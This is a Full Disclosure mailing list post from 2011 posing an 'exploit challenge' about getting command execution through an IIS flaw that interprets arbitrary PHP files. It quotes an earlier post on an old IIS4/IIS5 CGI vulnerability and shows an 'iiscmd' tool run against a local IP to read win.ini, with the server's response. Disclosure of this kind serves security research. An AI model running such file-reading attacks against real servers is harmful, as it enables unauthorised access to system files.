Full Disclosure mailing list archives
Exploit technical challenges
From: yuange <yuange1975 () hotmail com>
Date: Sat, 1 Jan 2011 09:21:40 +0000
http://hi.baidu.com/yuange1975/blog/item/843aaa97d8f8667f55fb9655.html Exploit technical challenges IIS known vulnerability allows an interpretation of any given php file. Challenge: How to execute arbitrary commands? Application Environment: Firewall configuration does not allow outside connections. Requirements: not required to upload files. From: yuange1975 () hotmail com To: full-disclosure () lists grok org uk Subject: iis4\iis5 cgi bug and WEB Service CGI Interface Vulnerability Analysis (continued) Date: Sat, 11 Dec 2010 06:06:37 +0000 Too many bad things in the belly of the fast. 2000 of iis, unicode \ decode \ cgi \ webdav \ etc vulnerability, reaching a peak, and later transferred to rpc study. Now there is a 01 or so found a serious flaw, iis4, 5 set error loading cgi vulnerability, execute arbitrary commands or view arbitrary files. Spent nearly a decade, this vulnerability have been quickly eaten away. Because iis5.1 core code into the kernel start iis, this exploit code has been dropped, so will not need a later version. There are loopholes in some time ago to write an article. Did not intend to put out, and feel that soon decayed, it released together. http://hi.baidu.com/yuange1975/blog/item/6432bffa52252f0fa8d311ac.html C:\tool>iiscmd -s 192.168.0.112 -f c:\winnt\win.ini recv: HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sat, 11 Dec 2010 05:21:17 GMT Connection: close X-Powered-By: PHP/4.0.0 Content-type: text/html ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 [MCI Extensions.BAK] asf=MPEGVideo asx=MPEGVideo ivf=MPEGVideo m3u=MPEGVideo mp2v=MPEGVideo mp3=MPEGVideo mpv2=MPEGVideo wax=MPEGVideo wm=MPEGVideo wma=MPEGVideo wmv=MPEGVideo wvx=MPEGVideo Server close!
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Exploit technical challenges yuange (Jan 01)